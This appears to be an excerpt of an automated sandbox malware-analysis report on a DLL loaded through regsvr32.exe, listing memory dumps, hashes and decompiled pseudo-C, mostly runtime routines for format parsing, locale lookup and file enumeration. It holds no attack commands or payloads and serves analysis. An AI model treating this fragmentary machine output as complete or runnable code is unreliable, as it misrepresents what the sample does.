                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$G]T$=w
                                                                      • API String ID: 0-536809368
                                                                      • Opcode ID: 547413946cac2108be29e448be70020b02cd0a3ce977c047f54dde3f208d5741
                                                                      • Instruction ID: 6b03589ca97f83b651aadd7cff27765e49b54c63d0b0b707eceb4e482c96155e
                                                                      • Opcode Fuzzy Hash: 547413946cac2108be29e448be70020b02cd0a3ce977c047f54dde3f208d5741
                                                                      • Instruction Fuzzy Hash: 68519EB190038E8FCB84DF68D88A4CE7BF0FF18348F115A19E829A6250D3B4D665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )'*$Y5*$o^]c
                                                                      • API String ID: 0-705021820
                                                                      • Opcode ID: d8f85cbcb726f1782d2da96bbf4976d7b65ced8102d34a5020c108af6f6b7685
                                                                      • Instruction ID: e2534bca5187155fdf33e3f794194eeb6cc6d73aca2a189c09a2d495bb0322f1
                                                                      • Opcode Fuzzy Hash: d8f85cbcb726f1782d2da96bbf4976d7b65ced8102d34a5020c108af6f6b7685
                                                                      • Instruction Fuzzy Hash: BE4192B181434A8FDB84CF64D48A5CE7FF0FB28398F214619F859A2250D3B496A48FD5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: @op$Wz$kB
                                                                      • API String ID: 0-1569465684
                                                                      • Opcode ID: 69b28b6e9c84cfcf83bbb1ba2e059718fe535da509d1410c02dfec789f26e3d5
                                                                      • Instruction ID: c7e894e888dd722cbba434805247e981d80487fabcf8ea81f41e2ef7fe8dd529
                                                                      • Opcode Fuzzy Hash: 69b28b6e9c84cfcf83bbb1ba2e059718fe535da509d1410c02dfec789f26e3d5
                                                                      • Instruction Fuzzy Hash: 4341A4B090038E8FCB44DF65D8864DF7FB0FB18358F510A19E86AA6220D7B4D665CF95
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E000000011800436B4(long long __rbx, void* __rcx, void* __rdx, long long __rsi, signed int __r8, void* __r9) {
                                                                      				void* _t19;
                                                                      				signed long long _t25;
                                                                      				void* _t27;
                                                                      				void* _t30;
                                                                      
                                                                      				_t19 = __rdx;
                                                                      				 *((long long*)(_t30 + 8)) = __rbx;
                                                                      				 *(_t30 + 0x10) = _t25;
                                                                      				 *((long long*)(_t30 + 0x18)) = __rsi;
                                                                      				_t27 = (_t25 | 0xffffffff) + 1;
                                                                      				if ( *((intOrPtr*)(__rcx + _t27)) != sil) goto 0x800436e2;
                                                                      				if (_t27 + __rdx -  !__r8 <= 0) goto 0x8004371e;
                                                                      				_t5 = _t19 + 0xb; // 0xc
                                                                      				return _t5;
                                                                      			}







                                                                      0x1800436b4
                                                                      0x1800436b4
                                                                      0x1800436b9
                                                                      0x1800436be
                                                                      0x1800436e2
                                                                      0x1800436e9
                                                                      0x1800436fc
                                                                      0x1800436fe
                                                                      0x18004371d

                                                                      APIs
                                                                        • Part of subcall function 000000018003C1F4: RtlAllocateHeap.NTDLL(?,?,00000000,000000018003885A,?,?,?,000000018003C005,?,?,?,?,00000001800558AE,?,?,00000000), ref: 000000018003C249
                                                                        • Part of subcall function 0000000180055798: _invalid_parameter_noinfo.LIBCMT ref: 00000001800557C0
                                                                      • FindFirstFileExW.KERNEL32 ref: 00000001800439AC
                                                                      • FindNextFileW.KERNEL32 ref: 0000000180043AE2
                                                                      • FindClose.KERNEL32 ref: 0000000180043B22
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Find$File$AllocateCloseFirstHeapNext_invalid_parameter_noinfo
                                                                      • String ID: C:\Windows\SYSTEM32\regsvr32.exe
                                                                      • API String ID: 4156727846-3569719448
                                                                      • Opcode ID: c61e670c4338befd23080cb1b626e99244bf26b3b85cbaed2062afdcee2b2d15
                                                                      • Instruction ID: c49aa85692968a4b2fdbe200ceb933a93a38583eddd4823992256a5b335260d3
                                                                      • Opcode Fuzzy Hash: c61e670c4338befd23080cb1b626e99244bf26b3b85cbaed2062afdcee2b2d15
                                                                      • Instruction Fuzzy Hash: B8812972304B8845EBA6DB22E4823EEA791F349BD8F058115BE99477D5CF38C259C744
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 27%
                                                                      			E00000001180036CD0(void* __edx, void* __rax, long long __rbx, void* __rcx, long long __rsi, long long __rbp, void* __r8, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _t11;
                                                                      				void* _t21;
                                                                      				void* _t32;
                                                                      
                                                                      				_t22 = __rbx;
                                                                      				_t21 = __rax;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t11 = r9d;
                                                                      				_t32 = __rcx;
                                                                      				E00000001180037D34(7, __rbx, "GetLocaleInfoEx", __rsi, 0x8005ffe0, 0x8005ffe8);
                                                                      				if (_t21 == 0) goto 0x80036d30;
                                                                      				r9d = _t11;
                                                                      				 *0x8007a018();
                                                                      				goto 0x80036d4a;
                                                                      				E00000001180037178(0, _t21, _t22, _t32);
                                                                      				r9d = _t11;
                                                                      				return GetLocaleInfoW(??, ??, ??, ??);
                                                                      			}






                                                                      0x180036cd0
                                                                      0x180036cd0
                                                                      0x180036cd0
                                                                      0x180036cd5
                                                                      0x180036cda
                                                                      0x180036ce4
                                                                      0x180036cf3
                                                                      0x180036d09
                                                                      0x180036d11
                                                                      0x180036d1d
                                                                      0x180036d28
                                                                      0x180036d2e
                                                                      0x180036d35
                                                                      0x180036d3c
                                                                      0x180036d5e

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: GetLocaleInfoEx
                                                                      • API String ID: 2299586839-2904428671
                                                                      • Opcode ID: dbd0115e48099de573ca5a8c4e05573fe0411c7b76b0bfd125df061e20fa9911
                                                                      • Instruction ID: 6a0da48a74a1d1c201182d68e46fbd4c20551b336a76bae26dcb902712bd99a9
                                                                      • Opcode Fuzzy Hash: dbd0115e48099de573ca5a8c4e05573fe0411c7b76b0bfd125df061e20fa9911
                                                                      • Instruction Fuzzy Hash: 3701A235B04B8485E7969B46F8007DBA361EB8DBC0F58C026FE4913B6ACE3CC6498380
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExceptionRaise_clrfp
                                                                      • String ID:
                                                                      • API String ID: 15204871-0
                                                                      • Opcode ID: 32d0e9da635d0a1aedba516c9720c77f45a1ee88025fae1cd92798c45dd461af
                                                                      • Instruction ID: a275cc5fb00489a5eed80ecea3063dba15a6a28d8a377f0c8a7b5db1479a742c
                                                                      • Opcode Fuzzy Hash: 32d0e9da635d0a1aedba516c9720c77f45a1ee88025fae1cd92798c45dd461af
                                                                      • Instruction Fuzzy Hash: 30B11C77600B488BEB56CF29C88639C77A0F348B88F19C916EA59977B4CF36D955C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /$Z$Z1&s
                                                                      • API String ID: 0-1813631882
                                                                      • Opcode ID: 7abc9e48179d234e5cba3f18692b9ac73c6e386a8030504e7da04a023713cc5c
                                                                      • Instruction ID: b90f74a2ddcd49a27a4af46388ae93caee05cffe5004764164621f893da506f6
                                                                      • Opcode Fuzzy Hash: 7abc9e48179d234e5cba3f18692b9ac73c6e386a8030504e7da04a023713cc5c
                                                                      • Instruction Fuzzy Hash: 83F1F774A0460D8BCF58DFA8C45A9EEBBF2FB58344F404129D806BB250DBB49915CFA9
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )jao$hZ))
                                                                      • API String ID: 0-4028603442
                                                                      • Opcode ID: ddd4554b70820ffd3bb7fffab539d96f99cb98332fad6050780363c7365e9a89
                                                                      • Instruction ID: e1cd607b3281926cd51f28d22971a0bbd4931f15fb79185ac5390705284ea608
                                                                      • Opcode Fuzzy Hash: ddd4554b70820ffd3bb7fffab539d96f99cb98332fad6050780363c7365e9a89
                                                                      • Instruction Fuzzy Hash: 55E1257490035DCBCF48DF68C89A4DE3FB1FB58398B165219EC4AAA350D3789994CBD8
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452456296.0000000002841000.00000020.00001000.00020000.00000000.sdmp, Offset: 02841000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_2841000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !Bt$Zl
                                                                      • API String ID: 0-3038540847
                                                                      • Opcode ID: 1ef0d2e10e079b98444c5560eb2e2c99037d6c57de0509c5eaf7053d9597e66b
                                                                      • Instruction ID: 387f88ff2465eb478e88b376754181f62f63ba76ee7c544714fca6d190c4eec9
                                                                      • Opcode Fuzzy Hash: 1ef0d2e10e079b98444c5560eb2e2c99037d6c57de0509c5eaf7053d9597e66b
                                                                      • Instruction Fuzzy Hash: CED1E275A0670CCBCB68DF68C58A49D7BE2FF54308B20512DEC1A9B262D774E825CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 47%
                                                                      			E0000000118000EB58(signed int __esi, long long __rbx, void* __rcx, long long __rbp, long long _a16, long long _a24) {
                                                                      				long long _v48;
                                                                      				long long _v56;
                                                                      				void* __rsi;
                                                                      				long long _t20;
                                                                      				void* _t26;
                                                                      				void* _t27;
                                                                      				void* _t33;
                                                                      
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t20 =  *((intOrPtr*)(__rcx + 8));
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != 0) goto 0x8000ebc3;
                                                                      				 *((char*)(_t20 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t20 + 0x2c)) = 0x16;
                                                                      				_v48 = _t20;
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v56 = __rbp;
                                                                      				E0000000118003AA20(_t20, __rcx,  *((intOrPtr*)(__rcx + 0x460)), _t26, _t27, __rbp, _t33);
                                                                      				return __esi | 0xffffffff;
                                                                      			}










                                                                      0x18000eb58
                                                                      0x18000eb5d
                                                                      0x18000eb6e
                                                                      0x18000eb84
                                                                      0x18000eb86
                                                                      0x18000eb8a
                                                                      0x18000eb91
                                                                      0x18000eb96
                                                                      0x18000eb99
                                                                      0x18000eb9c
                                                                      0x18000eba5
                                                                      0x18000ebc2

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $*
                                                                      • API String ID: 0-3982473090
                                                                      • Opcode ID: 9bf7c4080f607982795ef18dd41ddb9f45cf90c8431c8de7d74e622e8979b4c0
                                                                      • Instruction ID: fef0e201449535b739c11f3e8642c1d6cd669250411f793a03cce88e1ecb6f58
                                                                      • Opcode Fuzzy Hash: 9bf7c4080f607982795ef18dd41ddb9f45cf90c8431c8de7d74e622e8979b4c0
                                                                      • Instruction Fuzzy Hash: 67C150721046C886EBE6CF29C0543ED3BA5E34FB88F198126EB8957396CF35C649C715
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 51%
                                                                      			E00000001180015D9C(signed int __esi, long long __rbx, void* __rcx, void* __rdx, long long __rbp, void* __r8, long long _a16, long long _a24) {
                                                                      				long long _v48;
                                                                      				long long _v56;
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				intOrPtr _t121;
                                                                      				signed int _t133;
                                                                      				intOrPtr _t136;
                                                                      				intOrPtr _t137;
                                                                      				signed int _t150;
                                                                      				char _t157;
                                                                      				void* _t163;
                                                                      				signed int _t165;
                                                                      				signed int _t176;
                                                                      				void* _t199;
                                                                      				intOrPtr _t208;
                                                                      				intOrPtr* _t217;
                                                                      				intOrPtr* _t222;
                                                                      				intOrPtr _t224;
                                                                      				intOrPtr _t226;
                                                                      				void* _t229;
                                                                      				void* _t231;
                                                                      				intOrPtr _t241;
                                                                      				intOrPtr _t243;
                                                                      				void* _t249;
                                                                      				void* _t251;
                                                                      				long long _t252;
                                                                      				signed int* _t260;
                                                                      				signed int* _t261;
                                                                      
                                                                      				_t252 = __rbp;
                                                                      				_t246 = __rdx;
                                                                      				_t231 = __rcx;
                                                                      				_a16 = __rbx;
                                                                      				_a24 = __rbp;
                                                                      				_t208 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_t165 = __esi | 0xffffffff;
                                                                      				_t229 = __rcx;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x460)) != __rbp) goto 0x80015dd7;
                                                                      				 *((char*)(_t208 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t208 + 0x2c)) = 0x16;
                                                                      				goto 0x80016171;
                                                                      				if ( *((intOrPtr*)(__rcx + 0x10)) != __rbp) goto 0x80015e0d;
                                                                      				 *((char*)(_t208 + 0x30)) = 1;
                                                                      				r9d = 0;
                                                                      				 *((intOrPtr*)(_t208 + 0x2c)) = 0x16;
                                                                      				r8d = 0;
                                                                      				_v48 =  *((intOrPtr*)(__rcx + 8));
                                                                      				_v56 = __rbp;
                                                                      				E0000000118003AA20( *((intOrPtr*)(__rcx + 8)), __rcx, __rcx, __rdx, _t251, __rbp, __r8);
                                                                      				goto 0x80016191;
                                                                      				 *((intOrPtr*)(_t229 + 0x470)) =  *((intOrPtr*)(_t229 + 0x470)) + 1;
                                                                      				_t121 =  *((intOrPtr*)(_t229 + 0x470));
                                                                      				if (_t121 == 3) goto 0x8001618e;
                                                                      				if (_t121 != 2) goto 0x80015e3b;
                                                                      				if ( *((intOrPtr*)(_t229 + 0x474)) == 1) goto 0x8001618e;
                                                                      				_t261 = _t229 + 0x2c;
                                                                      				_t260 = _t229 + 0x30;
                                                                      				 *_t261 = 0;
                                                                      				 *_t260 = 0;
                                                                      				 *((long long*)(_t229 + 0x10)) =  *((intOrPtr*)(_t229 + 0x478));
                                                                      				 *((intOrPtr*)(_t229 + 0x474)) = 0;
                                                                      				 *(_t229 + 0xde0) = _t165;
                                                                      				 *(_t229 + 0xde4) = _t165;
                                                                      				 *((intOrPtr*)(_t229 + 0x48)) = 0;
                                                                      				 *(_t229 + 0x24) = bpl;
                                                                      				goto 0x8001610d;
                                                                      				if ( *(_t229 + 0x20) < 0) goto 0x80016121;
                                                                      				if (_t231 - 0x20 - 0x5a > 0) goto 0x80015e94;
                                                                      				goto 0x80015e97;
                                                                      				 *(_t229 + 0x24) =  *((intOrPtr*)(0x18005ee50));
                                                                      				if (E000000011800158B8(_t229, _t229, _t246) == 0) goto 0x8001618a;
                                                                      				if ( *(_t229 + 0x24) - 8 >= 0) goto 0x8001615e;
                                                                      				_t150 =  *(_t229 + 0x24) & 0x000000ff;
                                                                      				_t176 = _t150;
                                                                      				if (_t176 == 0) goto 0x80016017;
                                                                      				if (_t176 == 0) goto 0x80015ffe;
                                                                      				if (_t176 == 0) goto 0x80015fb6;
                                                                      				if (_t176 == 0) goto 0x80015f66;
                                                                      				if (_t176 == 0) goto 0x80015f5e;
                                                                      				if (_t176 == 0) goto 0x80015f1e;
                                                                      				if (_t176 == 0) goto 0x80015f11;
                                                                      				if (_t150 - 0xfffffffffffffffc != 1) goto 0x8001618a;
                                                                      				E00000001180016828(_t163, _t229, _t229, _t249, _t251);
                                                                      				goto 0x80015fa9;
                                                                      				E000000011800166A4(_t229);
                                                                      				goto 0x80015fa9;
                                                                      				if ( *((char*)(_t229 + 0x39)) == 0x2a) goto 0x80015f31;
                                                                      				E00000001180016570(_t229, _t229, _t260, _t251);
                                                                      				goto 0x80015fa9;
                                                                      				if (E0000000118001563C(_t229, _t229) == 0) goto 0x8001618a;
                                                                      				if ( *((intOrPtr*)(_t229 + 0x470)) != 1) goto 0x80015f54;
                                                                      				if ( *((intOrPtr*)(_t229 + 0x474)) != 1) goto 0x80016109;
                                                                      				if ( *_t260 >= 0) goto 0x80015fa7;
                                                                      				 *_t260 = _t165;
                                                                      				goto 0x80015fa7;
                                                                      				 *_t260 = 0;
                                                                      				goto 0x80016109;
                                                                      				if ( *((char*)(_t229 + 0x39)) == 0x2a) goto 0x80015f74;
                                                                      				goto 0x80015f2a;
                                                                      				if (E000000011800154CC(_t229, _t229) == 0) goto 0x8001618a;
                                                                      				if ( *((intOrPtr*)(_t229 + 0x470)) != 1) goto 0x80015f97;
                                                                      				if ( *((intOrPtr*)(_t229 + 0x474)) != 1) goto 0x80016109;
                                                                      				_t133 =  *_t261;
                                                                      				if (_t133 >= 0) goto 0x80015fa7;
                                                                      				 *(_t229 + 0x28) =  *(_t229 + 0x28) | 0x00000004;
                                                                      				 *_t261 =  ~_t133;
                                                                      				if (1 == 0) goto 0x8001618a;
                                                                      				goto 0x80016109;
                                                                      				_t136 =  *((intOrPtr*)(_t229 + 0x39));
                                                                      				if (_t136 == 0x20) goto 0x80015ff5;
                                                                      				if (_t136 == 0x23) goto 0x80015fec;
                                                                      				if (_t136 == 0x2b) goto 0x80015fe3;
                                                                      				if (_t136 == 0x2d) goto 0x80015fda;
                                                                      				if (_t136 != 0x30) goto 0x80016109;
                                                                      				 *(_t229 + 0x28) =  *(_t229 + 0x28) | 0x00000008;
                                                                      				goto 0x80016109;
                                                                      				 *(_t229 + 0x28) =  *(_t229 + 0x28) | 0x00000004;
                                                                      				goto 0x80016109;
                                                                      				 *(_t229 + 0x28) =  *(_t229 + 0x28) | 0x00000001;
                                                                      				goto 0x80016109;
                                                                      				 *(_t229 + 0x28) =  *(_t229 + 0x28) | 0x00000020;
                                                                      				goto 0x80016109;
                                                                      				 *(_t229 + 0x28) =  *(_t229 + 0x28) | 0x00000002;
                                                                      				goto 0x80016109;
                                                                      				 *_t261 = 0;
                                                                      				 *(_t229 + 0x38) = bpl;
                                                                      				 *(_t229 + 0x28) = 0;
                                                                      				 *_t260 = _t165;
                                                                      				 *((intOrPtr*)(_t229 + 0x34)) = 0;
                                                                      				 *(_t229 + 0x4c) = bpl;
                                                                      				goto 0x80016109;
                                                                      				_t137 =  *((intOrPtr*)(_t229 + 0x470));
                                                                      				if (_t137 != 1) goto 0x80016030;
                                                                      				if ( *((intOrPtr*)(_t229 + 0x474)) != 2) goto 0x80016041;
                                                                      				goto 0x80016109;
                                                                      				if (_t137 != 2) goto 0x80016041;
                                                                      				if ( *((intOrPtr*)(_t229 + 0x474)) == 0) goto 0x80016109;
                                                                      				 *(_t229 + 0x4c) = bpl;
                                                                      				if ( *((intOrPtr*)( *((intOrPtr*)(_t229 + 8)) + 0x28)) != bpl) goto 0x80016057;
                                                                      				E00000001180006E80(0xffffffffffffffe0, _t229,  *((intOrPtr*)(_t229 + 8)), _t261, _t251);
                                                                      				_t199 = r8d - _t165;
                                                                      				if (_t199 < 0) goto 0x800160ca;
                                                                      				if (_t199 == 0) goto 0x800160ca;
                                                                      				_t241 =  *((intOrPtr*)(_t229 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t241 + 0x10)) !=  *((intOrPtr*)(_t241 + 8))) goto 0x80016095;
                                                                      				if ( *((intOrPtr*)(_t241 + 0x18)) == bpl) goto 0x80016090;
                                                                      				 *(_t229 + 0x20) =  *(_t229 + 0x20) + 1;
                                                                      				goto 0x800160b3;
                                                                      				 *(_t229 + 0x20) = _t165;
                                                                      				goto 0x800160b3;
                                                                      				 *(_t229 + 0x20) =  *(_t229 + 0x20) + 1;
                                                                      				 *((long long*)(_t241 + 0x10)) =  *((long long*)(_t241 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x460)))))) = r8b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t229 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t229 + 0x460)))) + 1;
                                                                      				_t217 =  *((intOrPtr*)(_t229 + 0x10));
                                                                      				r8b =  *_t217;
                                                                      				 *((long long*)(_t229 + 0x10)) = _t217 + 1;
                                                                      				 *((intOrPtr*)(_t229 + 0x39)) = r8b;
                                                                      				if (r8b == 0) goto 0x80016132;
                                                                      				_t243 =  *((intOrPtr*)(_t229 + 0x460));
                                                                      				if ( *((intOrPtr*)(_t243 + 0x10)) !=  *((intOrPtr*)(_t243 + 8))) goto 0x800160eb;
                                                                      				if ( *((intOrPtr*)(_t243 + 0x18)) == bpl) goto 0x800160e6;
                                                                      				 *(_t229 + 0x20) =  *(_t229 + 0x20) + 1;
                                                                      				goto 0x80016109;
                                                                      				 *(_t229 + 0x20) = _t165;
                                                                      				goto 0x80016109;
                                                                      				 *(_t229 + 0x20) =  *(_t229 + 0x20) + 1;
                                                                      				 *((long long*)(_t243 + 0x10)) =  *((long long*)(_t243 + 0x10)) + 1;
                                                                      				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t229 + 0x460)))))) = r8b;
                                                                      				 *((long long*)( *((intOrPtr*)(_t229 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t229 + 0x460)))) + 1;
                                                                      				_t222 =  *((intOrPtr*)(_t229 + 0x10));
                                                                      				_t157 =  *_t222;
                                                                      				 *((long long*)(_t229 + 0x10)) = _t222 + 1;
                                                                      				 *((char*)(_t229 + 0x39)) = _t157;
                                                                      				if (_t157 != 0) goto 0x80015e72;
                                                                      				if (E000000011800153F8(_t229) == 0) goto 0x8001618a;
                                                                      				goto 0x80015e14;
                                                                      				_t224 =  *((intOrPtr*)(_t229 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				 *((char*)(_t224 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t224 + 0x2c)) = 0x16;
                                                                      				_v48 =  *((intOrPtr*)(_t229 + 8));
                                                                      				_v56 = _t252;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t229 + 8)), _t229, _t229, _t261, _t251, _t252,  *((char*)(_t229 + 0x39)));
                                                                      				_t226 =  *((intOrPtr*)(_t229 + 8));
                                                                      				 *((char*)(_t226 + 0x30)) = 1;
                                                                      				 *((intOrPtr*)(_t226 + 0x2c)) = 0x16;
                                                                      				_v48 =  *((intOrPtr*)(_t229 + 8));
                                                                      				r9d = 0;
                                                                      				r8d = 0;
                                                                      				_v56 = _t252;
                                                                      				E0000000118003AA20( *((intOrPtr*)(_t229 + 8)), _t229, _t229, _t261, _t251, _t252,  *((char*)(_t229 + 0x39)));
                                                                      				goto 0x80016191;
                                                                      				return  *(_t229 + 0x20);
                                                                      			}































                                                                      0x180015d9c
                                                                      0x180015d9c
                                                                      0x180015d9c
                                                                      0x180015d9c
                                                                      0x180015da1
                                                                      0x180015db2
                                                                      0x180015db6
                                                                      0x180015dbb
                                                                      0x180015dc5
                                                                      0x180015dc7
                                                                      0x180015dcb
                                                                      0x180015dd2
                                                                      0x180015ddb
                                                                      0x180015ddd
                                                                      0x180015de1
                                                                      0x180015de4
                                                                      0x180015deb
                                                                      0x180015df4
                                                                      0x180015dfb
                                                                      0x180015e00
                                                                      0x180015e08
                                                                      0x180015e14
                                                                      0x180015e1a
                                                                      0x180015e23
                                                                      0x180015e2c
                                                                      0x180015e35
                                                                      0x180015e42
                                                                      0x180015e46
                                                                      0x180015e4a
                                                                      0x180015e4d
                                                                      0x180015e50
                                                                      0x180015e54
                                                                      0x180015e5a
                                                                      0x180015e60
                                                                      0x180015e66
                                                                      0x180015e69
                                                                      0x180015e6d
                                                                      0x180015e75
                                                                      0x180015e80
                                                                      0x180015e92
                                                                      0x180015eaf
                                                                      0x180015eb9
                                                                      0x180015ec3
                                                                      0x180015ec9
                                                                      0x180015ecd
                                                                      0x180015ecf
                                                                      0x180015ed8
                                                                      0x180015ee1
                                                                      0x180015eea
                                                                      0x180015eef
                                                                      0x180015ef4
                                                                      0x180015ef9
                                                                      0x180015efe
                                                                      0x180015f07
                                                                      0x180015f0c
                                                                      0x180015f14
                                                                      0x180015f19
                                                                      0x180015f25
                                                                      0x180015f2a
                                                                      0x180015f2f
                                                                      0x180015f38
                                                                      0x180015f45
                                                                      0x180015f4e
                                                                      0x180015f57
                                                                      0x180015f59
                                                                      0x180015f5c
                                                                      0x180015f5e
                                                                      0x180015f61
                                                                      0x180015f6d
                                                                      0x180015f72
                                                                      0x180015f7b
                                                                      0x180015f88
                                                                      0x180015f91
                                                                      0x180015f97
                                                                      0x180015f9c
                                                                      0x180015f9e
                                                                      0x180015fa4
                                                                      0x180015fab
